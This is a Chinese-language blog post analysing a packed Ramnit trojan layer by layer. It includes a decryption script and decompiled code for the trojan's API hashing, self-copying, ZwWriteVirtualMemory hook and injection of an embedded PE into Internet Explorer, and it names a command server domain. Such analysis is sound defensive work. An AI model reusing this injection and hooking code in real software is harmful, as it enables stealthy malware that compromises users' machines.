記一次木馬分析

layout: post
title: 記一次木馬分析
categories: Reverse_Engineering
description: 記一次木馬分析
keywords:
url: https://lichao890427.github.io/ https://github.com/lichao890427/

記一次木馬分析

準(zhǔn)備工作

??從txt中把16進(jìn)制數(shù)據(jù)拷貝到WinHex,生成55k的exe文件,看pe節(jié)名發(fā)現(xiàn)upx殼,直接用upx脫殼機(jī),得到82k的exe文件,目前為止能看到的pe節(jié):

.code  00401000 0040A000 R . X . L para 0001 public CODE 32 0000 0000 0002 FFFFFFFF FFFFFFFF
.data  0040A000 00414000 R . . . L para 0002 public DATA 32 0000 0000 0002 FFFFFFFF FFFFFFFF
.rdata 00414000 00416000 R . . . L para 0003 public DATA 32 0000 0000 0002 FFFFFFFF FFFFFFFF

解密第一層

??IDA分析的所有函數(shù)都沒有意義的空函數(shù),主要混淆形式有:

  • 任意用無效參數(shù)調(diào)用api(因此導(dǎo)入表也基本是無用的),甚至存在檢測errorcode是否對應(yīng)目標(biāo)錯(cuò)誤值邏輯
    [圖片上傳失敗...(image-1246a4-1516627504447)]
  • 任意構(gòu)造函數(shù)調(diào)用
    [圖片上傳失敗...(image-735930-1516627504447)]
  • 入口函數(shù)start無返回(這里有玄機(jī))
    [圖片上傳失敗...(image-972fbc-1516627504447)]
  • 最后一個(gè)有效函數(shù)是sub_40724D這里,后面為無效數(shù)據(jù)(其實(shí)為真正代碼經(jīng)過加密了)
    [圖片上傳失敗...(image-cd1f17-1516627504447)]

??整個(gè)代碼只有j_VirtualAlloc的參數(shù)調(diào)用有意義的,返回分配的0xf000字節(jié)內(nèi)存地址(假定0x230000),每個(gè)函數(shù)調(diào)用最后會(huì)有jmp,要從jmp跟下去
[圖片上傳失敗...(image-29de4a-1516627504447)]

??上圖中0x2CA9是相對于VirtualAlloc分配地址的偏移,其實(shí)是第一次解密結(jié)果的入口處(假定0x232CA9),下圖是對這段內(nèi)存(假定0x230000~0x23f000)的解密,而使用的源數(shù)據(jù)恰好是無法正常反匯編的主函數(shù)那里(圖3 的0x401F46,在執(zhí)行call sub_4083E2的時(shí)候入棧),要跟蹤新eip走向可以直接下內(nèi)存斷點(diǎn)
[圖片上傳失敗...(image-3ef825-1516627504448)]

??這里對(0x230000,0x23f000)的內(nèi)存做解密操作,因此在ida中增加一個(gè)Segment(0x230000~0x23f000)來模擬,使用腳本解密:

dstaddr = 0x230000
srcaddr = 0x401F44
for off in range(0, 0xf000):
    b = Byte(srcaddr + off)
    b = b ^ 0xA2
    b = (((b & 0x3) << 6) | ((b >> 2) & 0xff)) & 0xff
    b = (b + 0x100 - 0x6C) & 0xff
PatchByte(dstaddr + off, b)

[圖片上傳失敗...(image-f8e96c-1516627504448)]

解密第二層

??由前一步解密出的新節(jié)可以分析出以下函數(shù):

GetFunction        +018C
fiximport          +04C2                
decode             +05E8
decode_1           +0743
getNtdllBase       +0783            
sub_2309AF         +09AF
UnmapSection       +0BD6
zeromem            +0C15
fixreloc           +1758
sub_2318FB         +18FB
decode_2           +1B35
Alloc              +1D68
resetself          +2275
memcpy             +22B0
decode_0           +2454
sub_2326F9         +26F9
sub_2326FB         +26FB
new_main           +2CA9
setmemoryexecute_  +2E13
loadimportdll      +2F2B
setmemoryexecute   +3077
GetFunctionFromEat +31D2
nullsub_5          +329D
Free               +32A0
nullsub_4          +32E2

來到入口點(diǎn):

ULONG __cdecl new_main(int a1, int a2, int a3, int segbase)//第四個(gè)參數(shù)為之前分配的內(nèi)存基址0x230000
{
  v30 = -1;
  v29 = 1;
  v17 = getNtdllBase(0xE0605F88);//分析①
  NtQuerySystemInformation = (void (__stdcall *)(int, int, int, signed int, _SYSTEM_PERFORMANCE_INFORMATION *, signed int))GetFunction(v17, 0xFB145B9B);//分析②
  NtQuerySystemInformation(v20, v21, v22, 2, &perfinfo, 0x138);// SYSTEM_PERFORMANCE_INFORMATION未發(fā)現(xiàn)實(shí)際作用
  result = perfinfo.CopyOnWriteCount;
  if ( (perfinfo.CopyOnWriteCount <= 0x84D0 || perfinfo.CopyOnWriteCount >= 0x8534)
    && (perfinfo.CopyOnWriteCount <= 0x8660 || perfinfo.CopyOnWriteCount >= 0x86C4) )//正常情況下可以直接進(jìn)
  {
    v35 = segbase;
    modulebase = retaddr;                       //圖6的0x40746D,為之前執(zhí)行的最后一個(gè)call
    do
      modulebase = (_IMAGE_DOS_HEADER *)(((unsigned int)&modulebase[-1].e_lfanew + 3) >> 15 << 15);
    while ( modulebase->e_magic != 'ZM' );//找到主模塊基址0x400000
    currentbase = modulebase;
    v31 = *(WORD *)((char *)&modulebase->e_cs + modulebase->e_lfanew);
    v44 = 12;
    v43 = 0x75115E4F;
    v42 = 0xFFD1A121;
    v41 = 0x17E;
    size = 0x6200;
    a3a = 0x937D;
    v40 = 0xC3A56632;
    imagesize = *(_DWORD *)((char *)currentbase + *((_DWORD *)currentbase + 15) + 80);//獲取exe模塊大小
    setmemoryexecute_((int)modulebase, imagesize, 64, (int)&v27);//內(nèi)存頁提權(quán):讀寫執(zhí)行
    v33 = (char *)currentbase + *(_DWORD *)((char *)currentbase + *((_DWORD *)currentbase + 15) + 40);//獲取入口點(diǎn)
    membase = Alloc(0, size);//分配一段內(nèi)存用作解密
    for ( dataseg = (int)currentbase; *(_DWORD *)dataseg != 0xDF62A7E; ++dataseg );//獲取data節(jié)基址,分析③
    v8 = dataseg + 4;
    decode(v8, a3a, v40);                       // 對data段解密
    if ( v44 & 8 )
      a3a = decode_0((char *)v8, a3a, v42, v41);    //第一次解密
    v10 = decode_2((char *)v8, a3a, v43);           //第二次解密
    if ( v44 & 4 )
      decode_1(v11, (_BYTE *)membase, v10);     //第三次解密
    else
      memcpy((void *)membase, v10, a3a);
    if ( v44 & 0x10 )       //不走這里
    {
      UnmapSection((int)currentbase);
      Free((char)currentbase, imagesize);
      v8 = *(_DWORD *)(membase + 60) + membase + 24;
      imagesize = *(_DWORD *)(*(_DWORD *)(membase + 60) + membase + 0x50);
      UnmapSection(*(_DWORD *)(v8 + 28));
      Free(*(_DWORD *)(v8 + 28), *(_DWORD *)(v8 + 56));
      currentbase = (void *)Alloc(*(_DWORD *)(v8 + 28), *(_DWORD *)(v8 + 56));
      *(_DWORD *)(__readfsdword(48) + 8) = currentbase;// 修改Imagebase
    }
    zeromem(v8, currentbase, imagesize);
    v9 = *(_DWORD *)(membase + 60) + membase;
    memcpy(currentbase, (const void *)membase, *(_DWORD *)(v9 + 0x54));//還原回0x400000
    if ( v31 & 0x2000 )
      *(_WORD *)((char *)currentbase + *((_DWORD *)currentbase + 15) + 22) = v26;
    v4 = *(_WORD *)(v9 + 6);
    v7 = v9 + 248;
    while ( v4 )
    {
      v15 = *(_DWORD *)(v7 + 16);
      memcpy((char *)currentbase + *(_DWORD *)(v7 + 12), (const void *)(membase + *(_DWORD *)(v7 + 20)), v24);
      v7 += 40;
      v4 = v6 - 1;
    }
    Free(membase, size);
    v32 = (char *)currentbase + *(_DWORD *)((char *)currentbase + *((_DWORD *)currentbase + 15) + 40);
    v16 = (char *)currentbase;
    resetself(//修改入口點(diǎn)
      (int)currentbase,//0x400000  Imagebase
      (int)v33,//0x42E000  old entry
      (int)v32,//0x411390   new entry
      *(_DWORD *)((char *)currentbase + *((_DWORD *)currentbase + 15) + 80));//sizeofImage
    fiximport((int)v16);//修復(fù)輸入表
    v14 = *(_DWORD *)&v16[*((_DWORD *)v16 + 15) + 52];
    fixreloc(v25, v12);//修復(fù)重定位表
    v13 = *(_WORD *)((char *)currentbase + *((_DWORD *)currentbase + 15) + 6);
    JUMPOUT(&loc_230C9A);//設(shè)置各個(gè)新節(jié)的屬性
  }
  return result;
}
  • 首先遇到的是getNtdllBase,該函數(shù)通過算法將模塊名事先計(jì)算出一個(gè)4字節(jié)值獲取peb結(jié)構(gòu),通過遍歷dll鏈表得到指定模塊基址:
int __cdecl getNtdllBase(int dllsig)// dllsig這里用作匹配模塊名,ntdll對應(yīng)0x FB145B9Bh
{
  int result; // eax@0
  int v2; // eax@2
  WCHAR *v3; // ecx@2
  int v4; // eax@7
  _LDR_DATA_TABLE_ENTRY *v5; // edx@1
  PLIST_ENTRY v6; // ebx@1

  v6 = (PLIST_ENTRY)(*(_DWORD *)(__readfsdword(48) + 12) + 12);// _PEB_LDR_DATA->InLoadOrderModuleList
  v5 = (_LDR_DATA_TABLE_ENTRY *)v6->Flink->Flink;
  while ( (PLIST_ENTRY)v5 != v6 )
  {
    v3 = v5->BaseDllName.Buffer;
    v2 = 0;
    while ( *v3 )
    {
      v2 = __ROL4__(v2, 7);
      LOBYTE(v2) = (*(_BYTE *)v3 | 0x20) ^ v2;
      ++v3;
    }
    v4 = v2 ^ 0x4B50FA82;
    if ( v4 == funcnamesig )
      return v5->DllBase;
    v5 = (_LDR_DATA_TABLE_ENTRY *)v5->InLoadOrderLinks.Flink;
    result = 0;
  }
  return result;
}
  • 然后遇到getFunction,該函數(shù)通過算法將函數(shù)名事先計(jì)算出一個(gè)4字節(jié)值,用作匹配DLL模塊導(dǎo)出表從而獲取函數(shù)基址
FARPROC __cdecl getFunction(int base, int funcsig)//base為模塊基址,目前為ntdll;funcsig用作匹配函數(shù)名,例如NtAllocateVirtualMemory對應(yīng)0x42025366
int __cdecl GetFunction(int ntdllbase, int sig)
{
  int v2; // ebp@0
  return GetFunctionFromEat(v2);//直接將ebp傳給該函數(shù),因此在子函數(shù)中ebp+8為第一個(gè)參數(shù),以此類推
}

int __usercall GetFunctionFromEat@<eax>(int a1@<ebp>)
{
  DWORD v1; // esi@1
  _IMAGE_EXPORT_DIRECTORY *exportbase; // eax@1
  int sig; // ebx@1

  exportbase = (_IMAGE_EXPORT_DIRECTORY *)(*(_DWORD *)(a1 + 8)
                                         + *(_DWORD *)(*(_DWORD *)(*(_DWORD *)(a1 + 8) + 0x3C)
                                                     + *(_DWORD *)(a1 + 8)
                                                     + 0x78));
  v1 = exportbase->AddressOfNames;
  *(_DWORD *)(a1 - 4) = exportbase->NumberOfNames;
  sig = *(_DWORD *)(a1 + 12);
  JUMPOUT(&loc_230925);//這里本質(zhì)是一個(gè)循環(huán)做匹配
}
  • 這個(gè)0xDF62A7E標(biāo)志正是data段的起始,od在新入口0x411390轉(zhuǎn)儲(chǔ)exe

[圖片上傳失敗...(image-e13e0-1516627504448)]
[圖片上傳失敗...(image-c61f22-1516627504448)]

解密第三層

??以上做的所有工作都是為了獲取入口點(diǎn),dump出來的文件帶mediaplayer圖標(biāo),185k,入口代碼:

void __usercall __noreturn start(int a1@<eax>, char *a2@<edx>, int a3@<ecx>, unsigned int a4@<ebp>)
{
//….仍然在修復(fù)導(dǎo)入表
      if ( checkbrowserexist("C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", 0x400u) == 1 )
      {
        v4 = createmutex("KyUffThOkYwRRtgPP");
        if ( v4 )
        {
          destroymutex(v4);
          v4 = HANDLE_FLAG_INHERIT;
        }
        if ( v4 == HANDLE_FLAG_INHERIT )
        {
          v5 = GetModuleFileNameA(0, selffile, 0x104u);
          makecstring((BYTE *)selffile, v5);
          if ( CopyAndRunTrojan(selffile) == 1 )//傳播自身到以下路徑:
    //%CommonProgramFiles%/Microsoft/DesktopLayer.exe
    //%HOMEDRIVE%%HOMEPATH%/Microsoft/DesktopLayer.exe
    //%APPDATA%/Microsoft/DesktopLayer.exe
    //%SYSTEM%/Microsoft/DesktopLayer.exe
    //%TMP%/Microsoft/DesktopLayer.exe
//%ProgramFiles%/Microsoft/DesktopLayer.exe
            ExitProcess(0);
          if ( GetNtdllFunction() == 1 )//實(shí)現(xiàn)獲取函數(shù)地址,以便給注入到IE的木馬使用
          {
            hookZwWriteVirtualMemory();//這里沒有直接inline hook入口點(diǎn),而是跳了5條指令
            CreateProcess((LPSTR)"C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", 1);
//通過上下邏輯可知CreateProcess觸發(fā)NtWriteVirtualMemory
            unhookZwWriteVirtualMemory();
          }
        }
      }
      ExitProcess(0);
    }   

    int __stdcall makeinlinehook(LPVOID procaddr, LPVOID hookaddr, int a4)
{
  if ( VirtualProtect(procaddr, 0xAu, 0x40u, &flOldProtect) )
  {
    v3 = skipninst(procaddr, 5u);//實(shí)現(xiàn)了小型的匯編指令長度引擎
    hookoff = v3;
    dwSize = v3 + 10;
    shell = VirtualAlloc(0, v3 + 10, 0x1000u, 0x40u);
    if ( shell )
    {
      v12 = shell;
      *(_DWORD *)shell = procaddr;
      *((_BYTE *)shell + 4) = hookoff;
      v5 = (int)shell + 5;
      memcpy(procaddr, (char *)shell + 5, hookoff);
      v6 = hookoff + v5;
      *(_BYTE *)v6 = 0xE9u;
      *(_DWORD *)(v6 + 1) = (_BYTE *)procaddr - (_BYTE *)v12 - 10;
      *(_BYTE *)procaddr = 0xE9u;
      *(_DWORD *)((char *)procaddr + 1) = (_BYTE *)hookaddr - (_BYTE *)procaddr - 5;
      *(_DWORD *)a4 = (char *)v12 + 5;
      VirtualProtect(v12, dwSize, flOldProtect, &v10);
      v9 = 1;
    }
    VirtualProtect(procaddr, 0xAu, flOldProtect, &v10);
  }
  return v9;
}

??我自己做了個(gè)實(shí)驗(yàn),CreateProcess也確實(shí)觸發(fā)了NtWriteVirtualMemory,且目標(biāo)句柄確實(shí)是IE的,所以重點(diǎn)在于掛鉤函數(shù)的分析:

// write access to const memory has been detected, the output may be wrong!
__int64 __stdcall new_ZwWriteVirtualMemory(HANDLE hProcess, PVOID BaseAddress, PVOID Buffer, int NumberOfBytesToWrite, int *NumberOfBytesWritten)
{
  __int64 v5; // rax@1
  char *v6; // eax@3
  LONGLONG v7; // kr00_8@4
  __int64 v9; // [sp-20h] [bp-28h]@1
  SIZE_T NumberOfBytesWrittena; // [sp+0h] [bp-8h]@5
  DWORD oldpro; // [sp+4h] [bp-4h]@5

  LODWORD(v5) = old_ZwWriteVirtualMemory(
                  hProcess,                     // here is IE process id
                  BaseAddress,                  //some address in IE
                  Buffer,
                  NumberOfBytesToWrite,
                  NumberOfBytesWritten);
  v9 = v5;
  if ( hProcess != (HANDLE)-1 && !ieentry )
  {
v6 = GetEntryPointForProcess(hProcess);
//利用ZwQueryInformationProcess從PEB里獲取IE進(jìn)程的ImageBase,之后解析內(nèi)存PE得到入口點(diǎn)
    if ( v6 )
    {
      dword_40DFA3 = 1;
      ieentry = v6;
      v7 = ModifyIe(hProcess, &injectcode, 0x9800);//將重要數(shù)據(jù)(INJECTSTR)和函數(shù)注入到目標(biāo)進(jìn)程,見①②
      ie_inject_d = HIDWORD(v7);
      ie_inject_f = v7;
      if ( ie_inject_f )
      {
        VirtualProtectEx(hProcess, ieentry, 0xCu, 0x40u, &oldpro);
        WriteProcessMemory(hProcess, ieentry, &jmpshell, 0xCu, &NumberOfBytesWrittena);//改寫IE入口點(diǎn)邏輯
                                                //jmpshell硬編碼以下指令: sizeof=0x0C
                                                // +00 0xBF            mov edi, ie_inject_f
                                                // +01 ie_inject_f
                                                // +05 0x68            push ie_inject_d
                                                // +06 ie_inejct_d
                                                // +0A 0xFF            call edi
                                                // +0B 0xD7
        VirtualProtectEx(hProcess, ieentry, 0xCu, oldpro, &oldpro);// 
      }
    }
  }
  return v9;
}
  • 將自身的木馬種植到目標(biāo)IE進(jìn)程,同時(shí)修復(fù)PE結(jié)構(gòu)
LONGLONG __stdcall ModifyIe(HANDLE hProcess, BYTE *injectdata, int injectlen)
{
  v19 = 0x10000000;
  optheader = (IMAGE_OPTIONAL_HEADER32 *)validate_getoptionheader((int)injectdata, injectlen);//驗(yàn)證PE結(jié)構(gòu)
  if ( !optheader )
    goto LABEL_18;
  imagebase = optheader->ImageBase;
  imagesize = optheader->SizeOfImage;
  do                 // 嘗試在自身進(jìn)程和IE進(jìn)程中獲取0x3000大小的同地址內(nèi)存
  {
    v19 += 0x10000;
    lpAddress = (LPVOID)(v19 + imagebase);
    injectbase = VirtualAlloc((LPVOID)(v19 + imagebase), imagesize, 0x3000u, 0x40u);
    if ( injectbase )
    {
      VirtualFree(injectbase, 0, 0x8000u);
      injectbase = VirtualAllocEx(hProcess, lpAddress, imagesize, 0x3000u, 0x40u);
    }
  }
  while ( v19 < 0x30000000 && !injectbase );
  if ( injectbase
&& ConstructPe(hProcess, injectbase, injectdata, injectlen, &inject_d, 0)
//從文件內(nèi)嵌的PE重新構(gòu)造重定位表、導(dǎo)入表以及各個(gè)節(jié),內(nèi)嵌PE見③
    && WriteProcessMemory(hProcess, injectbase, (LPCVOID)inject_d.ImageBase, inject_d.ImageSize, 0)// 0xD000
    && (len1 = getshellcodelen((unsigned __int8 *)FixImportTable),
        (v5 = (int (__stdcall *)(_DWORD, int, int, INJECTSTR *))AllocMemoryforShellCode(hProcess, FixImportTable, len1)) != 0)
    && (inject_d.FixImportTable = v5,
        len2 = getshellcodelen((unsigned __int8 *)setsegproperty),
        (v7 = (int (__stdcall *)(DWORD))AllocMemoryforShellCode(hProcess, setsegproperty, len2)) != 0)
    && (inject_d.SetSegProperty = v7,
        inject_d.LdrLoadDll = (FARPROC)LdrLoadDll,
        inject_d.LdrGetDllHandle = (FARPROC)LdrGetDllHandle,
        inject_d.LdrGetProcedureAddress = (FARPROC)LdrGetProcedureAddress,
        inject_d.RtlInitString = (FARPROC)RtlInitString,
        inject_d.RtlAnsiStringToUnicodeString = (FARPROC)RtlAnsiStringToUnicodeString,
        inject_d.RtlFreeUnicodeString = (FARPROC)RtlFreeUnicodeString,
        inject_d.ZwProtectVirtualMemory = (FARPROC)ZwProtectVirtualMemory,
        inject_d.ZwDelayExecution = (FARPROC)ZwDelayExecution,
        a = GetModuleFileNameA(0, inject_d.ImagePath, 0x104u),
        makecstring((BYTE *)inject_d.ImagePath, a),
        len3 = getshellcodelen((unsigned __int8 *)modifyieentry),
        (v9 = AllocMemoryforShellCode(hProcess, modifyieentry, len3)) != 0)
    && (v13 = (unsigned int)v9, (v10 = AllocMemoryforShellCode(hProcess, &inject_d, 0x138u)) != 0) )
  {
    result = __PAIR__((unsigned int)v10, v13);
  }
  else
  {
LABEL_18:
    result = 0i64;
  }
  return result;
}
  • 寫入的數(shù)據(jù)ie_inject_d結(jié)構(gòu)
00000000 INJECTSTR       struc ; (sizeof=0x138, mappedto_37) ; XREF: ModifyIe/r
00000000 ImageBase       dd ?           //注入木馬的基址
00000004 ImageEntry      dd ?           //注入木馬的入口
00000008 ImageSize       dd ?
0000000C FixImportTable  dd ?         //用于修復(fù)導(dǎo)入表
00000010 SetSegProperty  dd ?        //用于修復(fù)PE節(jié)屬性
00000014 LdrLoadDll      dd ?                    ; offset
00000018 LdrGetDllHandle dd ?                    ; offset
0000001C LdrGetProcedureAddress dd ?             ; offset
00000020 RtlInitString   dd ?                    ; offset
00000024 RtlAnsiStringToUnicodeString dd ?       ; offset
00000028 RtlFreeUnicodeString dd ?               ; offset
0000002C ZwProtectVirtualMemory dd ?             ; offset
00000030 ZwDelayExecution dd ?                   ; offset
00000034 ImagePath       db 260 dup(?)      //母程序路徑
00000138 INJECTSTR       ends

ie_inject_f函數(shù)仍然是修復(fù)導(dǎo)入表:

void __cdecl modifyieentry(INJECTSTR *injectdata)
{
  v1 = __readeflags();
  v6 = v1;
  if ( injectdata && injectdata->FixImportTable(0, injectdata->ImageBase, injectdata->ImageSize, injectdata) )
  {
    secnum = *(_WORD *)(*(_DWORD *)(injectdata->ImageBase + 60) + injectdata->ImageBase + 6);
    secheaders = (IMAGE_SECTION_HEADER *)(*(_WORD *)(*(_DWORD *)(injectdata->ImageBase + 60) + injectdata->ImageBase + 20)
                                        + *(_DWORD *)(injectdata->ImageBase + 60)
                                        + injectdata->ImageBase
                                        + 24);
    if ( *(_WORD *)(*(_DWORD *)(injectdata->ImageBase + 60) + injectdata->ImageBase + 6) )
    {
      do
      {
        v4 = secnum;
        v5 = injectdata->SetSegProperty(secheaders->Characteristics);
        v10 = secheaders->VirtualAddress + injectdata->ImageBase;
        v9 = secheaders->Misc.PhysicalAddress;
        ((void (__stdcall *)(signed int, DWORD *, DWORD *, int, char *))injectdata->ZwProtectVirtualMemory)(
          -1,
          &v10,
          &v9,
          v5,
          &v11);
        ++secheaders;
        secnum = v4 - 1;
      }
      while ( v4 != 1 );
    }
    ((void (__stdcall *)(int, signed int, char *))injectdata->ImageEntry)(//調(diào)用注入的木馬入口
      injectdata->ImageBase,
      1,
      injectdata->ImagePath);
    v7 = 0;
    v8 = 0x80000000;
    ((void (__stdcall *)(_DWORD, int *))injectdata->ZwDelayExecution)(0, &v7);
  }
  __writeeflags(v6);
}
  • 內(nèi)嵌PE
    [圖片上傳失敗...(image-3ee0f4-1516627504448)]

??上面的一切努力最后發(fā)現(xiàn)重點(diǎn)在于內(nèi)嵌PE邏輯中,直接用winhex將0x404031處0xD000大小的內(nèi)嵌PE取出,結(jié)果52k

內(nèi)嵌PE

[圖片上傳失敗...(image-d5faa3-1516627504448)]
??這次IDA已經(jīng)可以分析出來了,說明是最終形態(tài),搜索一些敏感的字符串可知是Ramnit病毒http://www.lavasoft.com/mylavasoft/malware-descriptions/blog/viruswin32ramnita,發(fā)現(xiàn)網(wǎng)上已有分析,因此沒有繼續(xù)分析,不過上述加密手段還有很多學(xué)習(xí)之處

  • 感染全盤exe dll,改寫入口點(diǎn),增加新PE節(jié).rmnet用于存儲(chǔ)惡意木馬
  • 感染html htm,增加如下腳本,在用戶%TEMP%文件夾中植入了一個(gè)名為“svchost.exe”的二進(jìn)制文件并執(zhí)行關(guān)聯(lián)的ActiveX控件,受感染的用戶主機(jī)會(huì)試圖連接到與Ramnit相關(guān)的一個(gè)木馬控制服務(wù)器——fget-career.com。如下兩圖所示
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時(shí)請結(jié)合常識(shí)與多方信息審慎甄別。
平臺(tái)聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點(diǎn),簡書系信息發(fā)布平臺(tái),僅提供信息存儲(chǔ)服務(wù)。

相關(guān)閱讀更多精彩內(nèi)容

友情鏈接更多精彩內(nèi)容